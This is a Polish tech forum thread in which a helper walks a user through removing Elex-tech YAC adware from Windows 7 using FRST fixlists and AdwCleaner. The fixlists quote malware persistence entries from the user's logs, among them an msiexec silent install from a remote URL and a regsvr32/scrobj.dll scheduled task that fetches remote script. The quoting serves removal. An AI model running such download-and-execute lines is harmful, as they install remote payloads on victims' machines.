Witamy na forum PC Format Zapraszamy do REJESTRACJI


Użytkownicy przeglądający ten wątek: 1 gości

Jak usunąć Elex-tech YAC ?

#1
Jak usunąć Elex-tech YAC ?
Cześć,

od jakiegoś czasu pojawiają mi się dziwne foldery na dysku C:/Pliki programów(x86) typu Elex-tech. Do tego automatycznie instalują się wyszukiwarki (chrome i mozilla) z syfiastymi wyszukiwarkami luckysearch itp. Wrzucam logi i proszę o pomoc w rozwiązaniu problemu.

FRST -> http://wklej.org/id/3119261/
Addition -> http://wklej.org/id/3119262/
Shortcut -> http://wklej.org/id/3119265/
ADWcleaner -> http://wklej.org/id/3119275/

Szymon
 System operacyjny: windows_seven Przeglądarka: chrome
#2
RE: Jak usunąć Elex-tech YAC ?
Daj to do działu bezpieczeństwo. Magik od wirusów morderca powie ci co robić.
 System operacyjny: android Przeglądarka: chrome
#3
RE: Jak usunąć Elex-tech YAC ?
Czy same przeglądarki mają też być usunięte czy tylko wyczyszczone z adaware?
Nie pomagam na PW (ew. odpłatnie). 
I osobom z roszczeniowym podejściem. I osobom niedbającym o poprawność językową.
Jak podawać logi
Jeśli nie odpowiadam w danym wątku przez >3 dni - proszę o przypomnienie na PW z linkiem do wątku w treści.




 System operacyjny: windows_seven Przeglądarka: firefox
#4
RE: Jak usunąć Elex-tech YAC ?
usunięte! zainstaluje od nowa po czyszczeniu.
 System operacyjny: windows_seven Przeglądarka: chrome
#5
RE: Jak usunąć Elex-tech YAC ?
Przez Panel sterowania odinstaluj Google Chrome, YAC(Yet Another Cleaner!).

Odinstaluj do końca Avast: https://www.avast.com/pl-pl/uninstall-utility

Do Notatnika wklej (bez frazy "Kod:"):
Kod:
HKU\S-1-5-21-1137468900-2000222604-907646855-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPDZ1mal8w3V4rDh6MjMyMXJhnXwyG2s2Mez8OTkyEdh1Z3F5OTJjOAVenH== /q
HKU\S-1-5-21-1137468900-2000222604-907646855-1000\...\Policies\Explorer: []
HKU\S-1-5-21-1137468900-2000222604-907646855-1000\...\MountPoints2: {00cf9362-1949-11e7-a118-00245420ed42} - F:\HiSuiteDownLoader.exe
HKU\S-1-5-21-1137468900-2000222604-907646855-1000\...\MountPoints2: {2d1a0afe-1a40-11e7-8abc-00245420ed42} - F:\HiSuiteDownLoader.exe
HKU\S-1-5-21-1137468900-2000222604-907646855-1000\...\MountPoints2: {a9d254de-8c68-11e6-85bc-00245420ed42} - "F:\WD SmartWare.exe" autoplay=true
HKU\S-1-5-21-1137468900-2000222604-907646855-1000\...\MountPoints2: {bcf34084-9876-11e6-afe0-00245420ed42} - F:\AutoRun.exe
HKU\S-1-5-21-1137468900-2000222604-907646855-1000\...\MountPoints2: {bcf3409d-9876-11e6-afe0-00245420ed42} - F:\AutoRun.exe
HKU\S-1-5-21-1137468900-2000222604-907646855-1000\...\MountPoints2: {bcf340ac-9876-11e6-afe0-00245420ed42} - F:\AutoRun.exe
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda)
C:\Program Files (x86)\Elex-tech
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== UWAGA
S3 iSafeKrnlBoot; system32\DRIVERS\iSafeKrnlBoot.sys [X] <==== UWAGA
C:\Windows\System32\DRIVERS\iSafeNetFilter.sys
C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys
2017-05-11 22:02 - 2017-05-11 22:02 - 00000000 ____D C:\Users\Szymon\AppData\Roaming\Elex-tech
2017-05-11 22:02 - 2017-05-11 22:02 - 00000000 ____D C:\Program Files (x86)\Elex-tech
2017-05-11 22:00 - 2017-05-18 15:31 - 00000000 _____ C:\Windows\SysWOW64\3333333
2017-05-11 21:59 - 2017-05-18 15:30 - 00000000 _____ C:\Windows\SysWOW64\1111111
2017-05-11 21:59 - 2017-05-18 15:30 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-11 21:59 - 2017-05-18 15:30 - 00000000 _____ C:\Windows\SysWOW64\11
2017-05-11 21:59 - 2017-05-18 15:30 - 00000000 _____ C:\Windows\SysWOW64\00
2017-05-11 21:59 - 2017-05-11 21:59 - 00000000 _____ C:\Windows\SysWOW64\22
2017-01-13 20:35 - 2017-05-16 20:00 - 0003706 _____ () C:\Users\Szymon\AppData\Roaming\gmshrc
2017-05-11 21:58 - 2017-05-11 21:58 - 0000000 _____ () C:\Users\Szymon\AppData\Local\{E95A76DC-A5CF-4262-BFE8-DCFC6CFBFD32}

2017-05-11 22:05 - 2017-05-18 15:32 - 00000000 ____D C:\Users\Szymon\AppData\LocalLow\Mozilla
2017-05-11 22:05 - 2017-05-11 22:05 - 00000000 ____D C:\Users\Szymon\AppData\Roaming\Mozilla

2017-05-03 15:20 - 2017-05-03 16:58 - 00000000 ____D C:\Users\Szymon\AppData\Local\Avira
2017-05-03 15:20 - 2017-05-03 15:20 - 00000000 ____D C:\Windows\System32\Tasks\Avira
2017-05-03 15:14 - 2017-05-03 15:14 - 00003664 _____ C:\Windows\System32\Tasks\AviraSystemSpeedupUpdate
2017-05-03 14:51 - 2017-05-13 21:25 - 00000000 ____D C:\Program Files (x86)\Avira
2017-05-03 14:51 - 2017-05-12 17:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2017-05-03 14:51 - 2017-05-12 17:19 - 00000000 ____D C:\ProgramData\Avira
2017-05-03 14:06 - 2017-05-18 15:31 - 00002000 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk

Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f
cmd: netsh advfirewall reset
EmptyTemp:
Skrypt unikatowy - proszę nie stosować do "takich samych" przypadków.

Plik > Zapisz jako: fixlist.txt w katalogu w którym jest FRST.exe. Uruchom FRST: Napraw > w tym samym katalogu powstanie log wynikowy: fixlog.txt. Potwierdź restart kompa.
Uwaga: narzędzie usunie wszystkie pliki tymczasowe.

Zamknij wszystkie przeglądarki, uruchom AdwCleaner > Skanuj > Oczyść > restart.
Pokaż log AdwCleaner + fixlog.txt + nowe logi FRST.
Nie pomagam na PW (ew. odpłatnie). 
I osobom z roszczeniowym podejściem. I osobom niedbającym o poprawność językową.
Jak podawać logi
Jeśli nie odpowiadam w danym wątku przez >3 dni - proszę o przypomnienie na PW z linkiem do wątku w treści.




 System operacyjny: windows_seven Przeglądarka: firefox
#6
RE: Jak usunąć Elex-tech YAC ?
AdwCleaner -> http://wklej.org/id/3126362/
fixlog -> http://wklej.org/id/3126366/
shortcut -> http://wklej.org/id/3126401/
frst -> http://wklej.org/id/3126413/
addition -> http://wklej.org/id/3126414/
 System operacyjny: windows_seven Przeglądarka: ie
#7
RE: Jak usunąć Elex-tech YAC ?
Odinstaluj: Akamai NetSession Interface.

Zainstaluj i odinstaluj Avira.

Do Notatnika wklej (bez frazy "Kod:"):
Kod:
Task: {0425F475-EFC8-4AD5-A2E4-18C06861D05B} - \Avira\System Speedup\SpeedupSysTray -> Brak pliku <==== UWAGA
Task: {564369CC-BCFF-4001-8316-12658E8A47A2} - \Avira\System Speedup\TestScheduler -> Brak pliku <==== UWAGA
Task: {80E019D5-8964-4D81-844D-EFEA076DEA42} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkPDZ1mal8w3V4rDh6MjMyMXJhnXwyG2s2Mez8OTkyEdh1Z3F5OTJjOAVenH== scrobj.dll
Task: {B99E4C86-38E8-4711-ABF3-977CF1CD6A90} - \AviraSystemSpeedupUpdate -> Brak pliku <==== UWAGA
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Update Notifier.lnk [2017-03-18]
ShortcutTarget: Update Notifier.lnk -> C:\Program Files\WinZip\WZUpdateNotifier.exe (WinZip)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinZip Preloader.lnk [2017-03-18]
ShortcutTarget: WinZip Preloader.lnk -> C:\Program Files\WinZip\WzPreloader.exe (WinZip Computing, S.L.)
Startup: C:\Users\Szymon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zSpeedup.lnk [2017-05-23]
ShortcutTarget: zSpeedup.lnk -> C:\FRST\Quarantine\C\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.Core.Common.Starter.exe (Avira Operations GmbH & Co. KG)
cmd: netsh advfirewall reset
EmptyTemp:
Skrypt unikatowy - proszę nie stosować do "takich samych" przypadków.

Plik > Zapisz jako: fixlist.txt w katalogu w którym jest FRST.exe. Uruchom FRST: Napraw > w tym samym katalogu powstanie log wynikowy: fixlog.txt. Potwierdź restart kompa.
Uwaga: narzędzie usunie wszystkie pliki tymczasowe.

Zamknij wszystkie przeglądarki, uruchom AdwCleaner > Skanuj > Oczyść > restart.
Pokaż log AdwCleaner + fixlog.txt + nowe logi FRST.
Nie pomagam na PW (ew. odpłatnie). 
I osobom z roszczeniowym podejściem. I osobom niedbającym o poprawność językową.
Jak podawać logi
Jeśli nie odpowiadam w danym wątku przez >3 dni - proszę o przypomnienie na PW z linkiem do wątku w treści.




 System operacyjny: windows_seven Przeglądarka: firefox
#8
RE: Jak usunąć Elex-tech YAC ?
adw -> http://www.wklej.org/id/3171100/
fixlog -> http://www.wklej.org/id/3171115/
frst -> http://www.wklej.org/id/3171134/
addition -> http://www.wklej.org/id/3171135/
shortcut -> http://www.wklej.org/id/3171146/

dodam, że po ostatniej naprawie znów pojawiły się problemyKwaśny tym razem zainstalowały się przeglądarki i jakies podejrzane foldery w Program Files. Avisry też do końca nie mogę usunąć, a dokładnie system speedup. Wyskakuje, że jest otwarty w innym programie. Coś tu nadal siedzi złego mam wrażenie.

Dzieki za pomoc! I proszę o więcej :D

Pozdrawiam,
Szymon
 System operacyjny: windows_seven Przeglądarka: chrome
#9
RE: Jak usunąć Elex-tech YAC ?
Witam, też miałem problem z tym podejrzanym oprogramowaniem ale chyba się tego pozbyłem. Proszę, chcę się upewnić że już wszystko ok. Dołączam logi z frst.

Addition: http://www.wklej.org/id/3222152/
frst: http://www.wklej.org/id/3222153/
Shortcut: http://www.wklej.org/id/3222154/
 System operacyjny: windows_seven Przeglądarka: chrome
#10
RE: Jak usunąć Elex-tech YAC ?
Załóż nowy wątek. Smutek
Masz wtedy większe szanse na zainteresowanie się Twoim problemem.
 System operacyjny: android Przeglądarka: chrome
Programy: Polecane / Nowe / Inne




Podobne wątki (Jak usunąć Elex-tech YAC ?)
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
Toungue Jak usunąć yahoo z przeglądarki. berneros 4 3441 02.07.2018, 20:20
Ostatni post: berneros
  Jak usunąć wyszukiwarkę yahoo Bobson1337 6 1212 06.06.2018, 21:53
Ostatni post: Bobson1337
  Jak usunąć pup.optional... funkyymonk 1 1159 23.03.2018, 12:05
Ostatni post: morderca

Skocz do:


Wybrane wątki (Jak usunąć Elex-tech YAC ?)
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
Toungue Jak usunąć yahoo z przeglądarki. berneros 4 3441 02.07.2018 20:20
Ostatni post: berneros
  Queteex, Dtdump stevie1 10 8613 27.06.2018 09:32
Ostatni post: stevie1
  Samoczynne otwieranie się stron internetowych Ahmed69 8 4301 24.06.2018 19:39
Ostatni post: Ahmed69
  Proszę o sprawdzenie logów kacperex44 10 8363 17.06.2018 20:11
Ostatni post: kacperex44
  Skrót do pendrivea po podłączeniu go do komputera winuszka 4 4389 08.06.2018 16:29
Ostatni post: morderca
  Jak usunąć wyszukiwarkę yahoo Bobson1337 6 1212 06.06.2018 21:53
Ostatni post: Bobson1337
  Perfidnie wyskakujące Popup, dlaczego? waple 4 4111 05.06.2018 20:02
Ostatni post: avecezar
  Kaspersky niemoże usunąć rootkita Ymir6066 4 1069 03.06.2018 16:48
Ostatni post: morderca
  przekierowanie w Chrome robert14-83 2 4542 25.05.2018 12:45
Ostatni post: robert14-83
  Sms i potencjalna kradzież Majki_77 5 4282 25.05.2018 10:30
Ostatni post: ptrick
  WIrus, blokujący antywirusy Slaox 1 4177 24.05.2018 08:23
Ostatni post: morderca
  "svchost próbuje połączyć się z internetem" - Comodo Mojmor23 11 9268 20.05.2018 21:32
Ostatni post: Illidan
  Co poradzić na ataki DDoS ? Alpha_Centauri 0 4143 16.05.2018 23:18
Ostatni post: Alpha_Centauri
  Długie otwieranie się przeglądarki i sytemu ricardo59 8 4548 12.05.2018 17:56
Ostatni post: ricardo59
  Win32:Malware-gen vader00x 1 4505 08.05.2018 18:44
Ostatni post: morderca